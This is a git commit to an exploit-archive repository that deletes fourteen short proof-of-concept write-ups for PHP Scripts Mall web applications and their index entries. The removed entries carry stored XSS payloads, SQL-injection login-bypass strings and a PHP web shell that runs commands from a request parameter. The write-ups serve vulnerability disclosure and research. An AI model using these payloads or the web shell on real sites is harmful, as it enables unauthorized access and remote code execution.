DB: 2018-09-17

29 changes to exploits/shellcodes Doctor Search Script 1.0.2 - Persistent Cross-Site Scripting Multilanguage Real Estate MLM Script - Persistent Cross-Site Scripting Naukri Clone Script - Persistent Cross-Site Scripting Hot Scripts Clone Script Classified - Persistent Cross-Site Scripting Facebook Clone Script 1.0.5 - Cross-Site Scripting Schools Alert Management Script 2.0.2 - Arbitrary File Upload Lawyer Search Script 1.0.2 - Cross-Site Scripting Bitcoin MLM Software 1.0.2 - Cross-Site Scripting Select Your College Script 2.0.2 - Authentication Bypass Multi religion Responsive Matrimonial 4.7.2 - Cross-Site Scripting Learning and Examination Management System - Cross-Site Scripting Alibaba Clone Script 1.0.2 - Cross-Site Scripting Groupon Clone Script 3.0.2 - Cross-Site Scripting Schools Alert Management Script 2.0.2 - Authentication Bypass
2018-09-17 05:02:03 +00:00 · 2018-09-17 05:02:03 +00:00 · 3e5849385e
commit 3e5849385e
parent c1b7aa12fc
16 changed files with 1 additions and 287 deletions
--- a/exploits/macos/dos/45391.py
+++ b/exploits/macos/dos/45391.py
@ -1,5 +1,5 @@
 # Exploit Title: Apple MacOS 10.13.4 - Denial of Service (PoC)
-# Date: 2019-09-10
+# Date: 2018-09-10
 # Exploit Author: Sriram (@Sri_Hxor)
 # Vendor Homepage: https://support.apple.com/en-in/HT208848
 # Tested on: macOS High Sierra 10.13.4, iOS 11.3, tvOS 11.3, watchOS 4.3.0
--- a/exploits/php/webapps/43988.txt
+++ b/exploits/php/webapps/43988.txt
@ -1,19 +0,0 @@
 ######################################################################################
 # Exploit Title: PHP Scripts Mall Doctor Search Script 1.0.2 has Stored XSS.
 # Date: 06.02.2018
 # Exploit Author: Prasenjit Kanti Paul
 # Web: http://hack2rule.wordpress.com/
 # Vendor Homepage: https://www.phpscriptsmall.com/
 # Software Link: https://www.phpscriptsmall.com/product/doctor-search-script/
 # Category: Web Application
 # Version: 1.0.2
 # Tested on: Linux Mint
 # CVE: CVE-2018-6655
 #######################################################################################
 *Proof of Concept*
 1. Login as a user
 2. Goto "Edit Profile"
 3. Edit any field with "<script>alert("PKP")</script>"
 4. Save Profile
 5. You will be having a popup "PKP"
--- a/exploits/php/webapps/43989.txt
+++ b/exploits/php/webapps/43989.txt
@ -1,20 +0,0 @@
 ######################################################################################
 # Exploit Title: Multilanguage Real Estate MLM Script - Stored XSS
 # Date: 06.02.2018
 # Exploit Author: Prasenjit Kanti Paul
 # Web: http://hack2rule.wordpress.com/
 # Vendor Homepage: https://www.phpscriptsmall.com/
 # Software Link: http://www.exclusivescript.com/product/y2OP4658391/php-scripts/multilanguage-real-estate-mlm-script
 # Category: Web Application
 # Version: =>3.0
 # Tested on: Linux Mint
 # CVE: NA
 #######################################################################################
 Proof of Concept
 =================
 1. Login as a user
 2. Goto "Edit Profile"
 3. Edit any field with "<script>alert("PKP")</script>"
 4. Save Profile
 5. You will be having a popup "PKP"
--- a/exploits/php/webapps/43990.txt
+++ b/exploits/php/webapps/43990.txt
@ -1,20 +0,0 @@
 ######################################################################################
 # Exploit Title: Naukri Clone Script - Stored XSS
 # Date: 06.02.2018
 # Exploit Author: Prasenjit Kanti Paul
 # Web: http://hack2rule.wordpress.com/
 # Vendor Homepage: https://www.phpscriptsmall.com/
 # Software Link: https://www.phpscriptsmall.com/product/naukri-clone-script/
 # Category: Web Application
 # Version: 3.0.3
 # Tested on: Linux Mint
 # CVE: na
 #######################################################################################
 Proof of Concept
 =================
 1. Login as a jobseeker
 2. Goto "Edit Profile"
 3. Edit any field with "<script>alert("PKP")</script>"
 4. Save Profile
 5. You will be having a popup "PKP"
--- a/exploits/php/webapps/43991.txt
+++ b/exploits/php/webapps/43991.txt
@ -1,20 +0,0 @@
 ######################################################################################
 # Exploit Title: Hot Scripts Clone : Script Classified - Stored XSS
 # Date: 06.02.2018
 # Exploit Author: Prasenjit Kanti Paul
 # Web: http://hack2rule.wordpress.com/
 # Vendor Homepage: https://www.phpscriptsmall.com/
 # Software Link: https://www.phpscriptsmall.com/product/hot-scripts-clone-script-classified/
 # Category: Web Application
 # Version: 3.1
 # Tested on: Linux Mint
 # CVE: na
 #######################################################################################
 Proof of Concept
 =================
 1. Login to Hot Scripts Clone : Script Classified
 2. Select Any Ads
 3. Goto below review section and put "<script>alert("PKP")</script>" as
 title or description
 4. You will have popup of "PKP"
--- a/exploits/php/webapps/44010.txt
+++ b/exploits/php/webapps/44010.txt
@ -1,19 +0,0 @@
 ######################################################################################
 # Exploit Title: Facebook Clone Script 1.0.5 - Stored XSS
 # Date: 07.02.2018
 # Vendor Homepage: https://www.phpscriptsmall.com/
 # Software Link: https://www.phpscriptsmall.com/product/naukri-clone-script/
 # Category: Web Application
 # Exploit Author: Prasenjit Kanti Paul
 # Web: http://hack2rule.wordpress.com/
 # Version: 1.0.5
 # Tested on: Linux Mint
 # CVE: CVE-2018-6858
 #######################################################################################
 Proof of Concept
 =================
 1. Login as a user
 2. Goto "Comment" option of any post
 3. Put "<script>alert("PKP")</script>" as comment
 4. You will be having a popup "PKP"
--- a/exploits/php/webapps/44011.txt
+++ b/exploits/php/webapps/44011.txt
@ -1,22 +0,0 @@
 #################################################################################################################
 # Exploit Title: Schools Alert Management Script - 2.0.2 - Arbitrary File Upload / Remote Code Execution
 # Date: 07.02.2018
 # Vendor Homepage: https://www.phpscriptsmall.com/
 # Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
 # Category: Web Application
 # Exploit Author: Prasenjit Kanti Paul
 # Web: http://hack2rule.wordpress.com/
 # Version: 2.0.2
 # Tested on: Linux Mint
 # CVE: CVE-2018-6860
 ##################################################################################################################
 Proof of Concept
 =================
 1. Login as Student/Parent
 2. Go to "Edit Profile" to upload profile picture.
 3. Once you find upload section, upload following code as a PHP file: 
    <?php
        if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }
    ?>
 4. Try to access given PHP file : [site.com]/malicious.php?cmd=ls
--- a/exploits/php/webapps/44012.txt
+++ b/exploits/php/webapps/44012.txt
@ -1,19 +0,0 @@
 #################################################################################################################
 # Exploit Title: Lawyer Search Script - 1.0.2 - Stored XSS
 # Date: 07.02.2018
 # Vendor Homepage: https://www.phpscriptsmall.com/
 # Software Link: https://www.phpscriptsmall.com/product/lawyer-script/
 # Category: Web Application
 # Exploit Author: Prasenjit Kanti Paul
 # Web: http://hack2rule.wordpress.com/
 # Version: 1.0.2
 # Tested on: Linux Mint
 # CVE: CVE-2018-6861
 ##################################################################################################################
 *Proof of Concept*
 1. Login into site
 2. Goto "Edit Profile"
 3. Put "<script>alert("PKP")</script>" in any field
 4. You will be having a popup "PKP"
--- a/exploits/php/webapps/44013.txt
+++ b/exploits/php/webapps/44013.txt
@ -1,19 +0,0 @@
 ########################################################################
 # Exploit Title: Bitcoin MLM Software 1.0.2 - Stored XSS
 # Date: 07.02.2018
 # Vendor Homepage: https://www.phpscriptsmall.com/
 # Software Link: https://www.phpscriptsmall.com/product/bitcoin-mlm/
 # Category: Web Application
 # Exploit Author: Prasenjit Kanti Paul
 # Web: http://hack2rule.wordpress.com/
 # Version: 1.0.2
 # Tested on: Linux Mint
 # CVE: CVE-2018-6862
 ##########################################################################
 *Proof of Concept*
 1. Login into the site
 2. Goto "Edit Profile"
 3. Put "<script>alert("PKP")</script>" in any field
 4. You will be having a popup "PKP"
--- a/exploits/php/webapps/44014.txt
+++ b/exploits/php/webapps/44014.txt
@ -1,18 +0,0 @@
 ######################################################################################
 # Exploit Title: Select Your College Script - 2.0.2 - Authentication Bypass
 # Date: 07.02.2018
 # Vendor Homepage: https://www.phpscriptsmall.com/
 # Software Link:https://www.phpscriptsmall.com/product/select-your-college-script/
 # Category: Web Application
 # Exploit Author: Prasenjit Kanti Paul
 # Web: http://hack2rule.wordpress.com/
 # Version: 2.0.2
 # Tested on: Linux Mint
 # CVE: CVE-2018-6863
 #######################################################################################
 Proof of Concept
 1. Goto login page
 2. put [admin' OR '1' = '1] as user and password field
 3. You will be logged in as an authenticated user
--- a/exploits/php/webapps/44015.txt
+++ b/exploits/php/webapps/44015.txt
@ -1,20 +0,0 @@
 #################################################################################################################
 # Exploit Title: Multi religion Responsive Matrimonial - 4.7.2 - Stored XSS
 # Date: 07.02.2018
 # Vendor Homepage: https://www.phpscriptsmall.com/
 # Software Link:
 https://www.phpscriptsmall.com/product/multireligion-responsive-matrimonial/
 # Category: Web Application
 # Exploit Author: Prasenjit Kanti Paul
 # Web: http://hack2rule.wordpress.com/
 # Version: 4.7.2
 # Tested on: Linux Mint
 # CVE: CVE-2018-6864
 ##################################################################################################################
 *Proof of Concept*
 1. Login into site
 2. Goto "Edit Profile"
 3. Put "<script>alert("PKP")</script>" in any field
 4. You will be having a popup "PKP"
--- a/exploits/php/webapps/44170.txt
+++ b/exploits/php/webapps/44170.txt
@ -1,19 +0,0 @@
 #######################################################
 # Exploit Title: Learning and Examination Management System Script 2.3.1 – Stored XSS
 # Date: 09.02.2018
 # Vendor Homepage: https://www.phpscriptsmall.com/
 # Software Link: https://www.phpscriptsmall.com/product/learning-examination-management-system/
 # Category: Web Application
 # Exploit Author: Prasenjit Kanti Paul
 # Web: http://hack2rule.wordpress.com/
 # Version: 2.3.1
 # Tested on: Linux Mint
 # CVE: CVE-2018-6866
 #######################################################
 Proof of Concept
 -----------------
 1. Login into the site
 2. Goto “Message” options
 3. Put <script>alert("PKP")</script> as message / reply message
 4. You will be having a popup “PKP”
--- a/exploits/php/webapps/44171.txt
+++ b/exploits/php/webapps/44171.txt
@ -1,19 +0,0 @@
 #######################################################
 # Exploit Title: Alibaba Clone Script 1.0.2 – Stored XSS
 # Date: 09.02.2018
 # Vendor Homepage: https://www.phpscriptsmall.com/
 # Software Link: https://www.phpscriptsmall.com/product/alibaba-clone/
 # Category: Web Application
 # Exploit Author: Prasenjit Kanti Paul
 # Web: http://hack2rule.wordpress.com/
 # Version: 1.0.2
 # Tested on: Linux Mint
 # CVE: CVE-2018-6867
 #######################################################
 Proof of Concept
 -----------------
 1. Login into the site
 2. Goto “Edit Profile”
 3. Put <script>alert("PKP")</script> in any field
 4. You will be having a popup “PKP”
--- a/exploits/php/webapps/44172.txt
+++ b/exploits/php/webapps/44172.txt
@ -1,19 +0,0 @@
 ########################################################################
 # Exploit Title: Slickdeals/DealNews/Groupon Clone Script 3.0.2 – Stored XSS
 # Date: 09.02.2018
 # Vendor Homepage: https://www.phpscriptsmall.com/
 # Software Link: https://www.phpscriptsmall.com/product/groupon-clone-script/
 # Category: Web Application
 # Exploit Author: Prasenjit Kanti Paul
 # Web: http://hack2rule.wordpress.com/
 # Version: 3.0.2
 # Tested on: Linux Mint
 # CVE: CVE-2018-6868
 ##########################################################################
 Proof of Concept
 ------------------------
 1. Login into the site
 2. Goto “Edit Profile”
 3. Put <script>alert("PKP")</script> in any field
 4. You will be having a popup “PKP”
--- a/exploits/php/webapps/44185.txt
+++ b/exploits/php/webapps/44185.txt
@ -1,19 +0,0 @@
 ######################################################################################
 # Exploit Title: Schools Alert Management Script - 2.0.2 - Authentication Bypass
 # Date: 07.02.2018
 # Vendor Homepage: https://www.phpscriptsmall.com/
 # Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
 # Category: Web Application
 # Exploit Author: Prasenjit Kanti Paul
 # Web: http://hack2rule.wordpress.com/
 # Version: 2.0.2
 # Tested on: Linux Mint
 # CVE: CVE-2018-6859
 #######################################################################################
 Proof of Concept
 =================
 1. Go to login page
 2. Choose Student/Parent/Management to login
 2. put [admin' OR '1' = '1] as user and password field
 3. You will be logged in as Student/Parent/Management
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -38614,19 +38614,9 @@ id,file,description,date,author,type,platform,port
 43978,exploits/php/webapps/43978.txt,"Joomla! Component JSP Tickets 1.1 - SQL Injection",2018-02-05,"Ihsan Sencan",webapps,php,
 43980,exploits/php/webapps/43980.txt,"Student Profile Management System Script 2.0.6 - Authentication Bypass",2018-02-05,L0RD,webapps,php,
 43981,exploits/hardware/webapps/43981.txt,"Netis WF2419 Router - Cross-Site Scripting",2018-02-05,"Sajibe Kanti",webapps,hardware,
 43988,exploits/php/webapps/43988.txt,"Doctor Search Script 1.0.2 - Persistent Cross-Site Scripting",2018-02-07,"Prasenjit Kanti Paul",webapps,php,80
 43989,exploits/php/webapps/43989.txt,"Multilanguage Real Estate MLM Script - Persistent Cross-Site Scripting",2018-02-07,"Prasenjit Kanti Paul",webapps,php,80
 43990,exploits/php/webapps/43990.txt,"Naukri Clone Script - Persistent Cross-Site Scripting",2018-02-07,"Prasenjit Kanti Paul",webapps,php,80
 43991,exploits/php/webapps/43991.txt,"Hot Scripts Clone Script Classified - Persistent Cross-Site Scripting",2018-02-07,"Prasenjit Kanti Paul",webapps,php,80
 43994,exploits/php/webapps/43994.txt,"Online Test Script 2.0.7 - 'cid' SQL Injection",2018-02-07,L0RD,webapps,php,80
 43995,exploits/php/webapps/43995.txt,"Entrepreneur Dating Script 2.0.2 - Authentication Bypass",2018-02-07,L0RD,webapps,php,80
 44008,exploits/php/webapps/44008.txt,"Naukri Clone Script 3.0.3 - 'indus' SQL Injection",2018-02-10,L0RD,webapps,php,
 44010,exploits/php/webapps/44010.txt,"Facebook Clone Script 1.0.5 - Cross-Site Scripting",2018-02-10,"Prasenjit Kanti Paul",webapps,php,
 44011,exploits/php/webapps/44011.txt,"Schools Alert Management Script 2.0.2 - Arbitrary File Upload",2018-02-10,"Prasenjit Kanti Paul",webapps,php,
 44012,exploits/php/webapps/44012.txt,"Lawyer Search Script 1.0.2 - Cross-Site Scripting",2018-02-10,"Prasenjit Kanti Paul",webapps,php,
 44013,exploits/php/webapps/44013.txt,"Bitcoin MLM Software 1.0.2 - Cross-Site Scripting",2018-02-10,"Prasenjit Kanti Paul",webapps,php,
 44014,exploits/php/webapps/44014.txt,"Select Your College Script 2.0.2 - Authentication Bypass",2018-02-10,"Prasenjit Kanti Paul",webapps,php,
 44015,exploits/php/webapps/44015.txt,"Multi religion Responsive Matrimonial 4.7.2 - Cross-Site Scripting",2018-02-10,"Prasenjit Kanti Paul",webapps,php,
 44016,exploits/php/webapps/44016.txt,"Multi Language Olx Clone Script - Cross-Site Scripting",2018-02-10,"Varun Bagaria",webapps,php,
 44017,exploits/php/webapps/44017.txt,"Paypal Clone Script 1.0.9 - 'id' / 'acctype' SQL Injection",2018-02-11,L0RD,webapps,php,
 44018,exploits/php/webapps/44018.txt,"Readymade Video Sharing Script 3.2 - 'search' SQL Injection",2018-02-11,"Varun Bagaria",webapps,php,
@ -39455,10 +39445,6 @@ id,file,description,date,author,type,platform,port
 44164,exploits/php/webapps/44164.txt,"Joomla! Component Proclaim 9.1.1 - Arbitrary File Upload",2018-02-22,"Ihsan Sencan",webapps,php,
 44165,exploits/php/webapps/44165.txt,"Joomla! Component OS Property Real Estate 3.12.7 - SQL Injection",2018-02-22,"Ihsan Sencan",webapps,php,
 44166,exploits/jsp/webapps/44166.txt,"Trend Micro Email Encryption Gateway 5.5 (Build 1111.00) - Multiple Vulnerabilities",2018-02-22,"Core Security",webapps,jsp,
 44170,exploits/php/webapps/44170.txt,"Learning and Examination Management System - Cross-Site Scripting",2018-02-22,"Prasenjit Kanti Paul",webapps,php,
 44171,exploits/php/webapps/44171.txt,"Alibaba Clone Script 1.0.2 - Cross-Site Scripting",2018-02-22,"Prasenjit Kanti Paul",webapps,php,
 44172,exploits/php/webapps/44172.txt,"Groupon Clone Script 3.0.2 - Cross-Site Scripting",2018-02-22,"Prasenjit Kanti Paul",webapps,php,
 44185,exploits/php/webapps/44185.txt,"Schools Alert Management Script 2.0.2 - Authentication Bypass",2018-02-27,"Prasenjit Kanti Paul",webapps,php,
 44186,exploits/php/webapps/44186.txt,"MyBB My Arcade Plugin 1.3 - Cross-Site Scripting",2018-02-27,0xB9,webapps,php,
 44276,exploits/multiple/webapps/44276.txt,"Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials",2018-03-12,LiquidWorm,webapps,multiple,
 44191,exploits/php/webapps/44191.txt,"School Management Script 3.0.4 - Authentication Bypass",2018-02-27,"Samiran Santra",webapps,php,